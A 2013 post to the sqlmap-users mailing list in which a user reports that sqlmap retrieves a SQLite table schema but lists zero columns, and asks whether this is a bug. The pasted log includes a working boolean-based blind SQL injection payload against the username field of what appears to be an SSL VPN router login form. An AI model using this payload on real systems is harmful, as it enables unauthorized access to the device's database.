[sqlmap-users] Error with Sqlite

Mon, 01 Apr 2013 10:58:27 -0700 

When trying to enumerate columns names from a table (-T tablename
--columns) sqlmap successfully retrieves the schema from sqlite_master,
however it fails on identifying the columns names. I get the next output:

****************************************************************************

[11:57:54] [INFO] resuming back-end DBMS 'sqlite'
[11:57:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: POST
Parameter: SSLVPNUser.UserName
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: thispage=[redacted]&SSLVPNUser.UserName=-8559' OR (8414=8414)
AND
'NdYt'='NdYt&SSLVPNUser.Password=[redacted]&button.login.routerStatus=Log
In&Login.userAgent=Mozilla/5.0 (X11%3B Ubuntu%3B Linux x86_64%3B rv:19.0)
Gecko/20100101 Firefox/19.0
---
[11:57:55] [INFO] the back-end DBMS is SQLite
[11:57:55] [INFO] fetching banner
[11:57:56] [INFO] resumed: 3.3.17
back-end DBMS: SQLite
banner:    '3.3.17'
[11:57:56] [INFO] fetching columns for table 'dbUpdateRegisterTbl' in
database 'SQLite_masterdb'
[11:57:56] [WARNING] running in a single-thread mode. Please consider usage
of option '--threads' for faster data retrieval
[11:57:56] [INFO] retrieved: CREATE TABLE dbUpdateRegisterTbl '
compName text NOT NULL,     stopIfError integer NOT NULL,     waitForMe
integer NOT NULL,     tableName text NOT NULL,     rowIndex  integer,
onUpdate integer NOT NULL,     onAdd   integer NOT NULL,     onDelete
integer NOT NULL )
Database: SQLite_masterdb
Table: dbUpdateRegisterTbl
[0 columns]
+--------+
| Column |
+--------+
+--------+

[12:35:19] [INFO] fetched data logged to text files under '[redacted]'

****************************************************************************

The same happens with every table in the DB.

Is this some bug in sqlmap or something exceptional with the DB.

------------------------------------------------------------------------------
Own the Future-Intel® Level Up Game Demo Contest 2013
Rise to greatness in Intel's independent game demo contest.
Compete for recognition, cash, and the chance to get your game 
on Steam. $5K grand prize plus 10 genre and skill prizes. 
Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to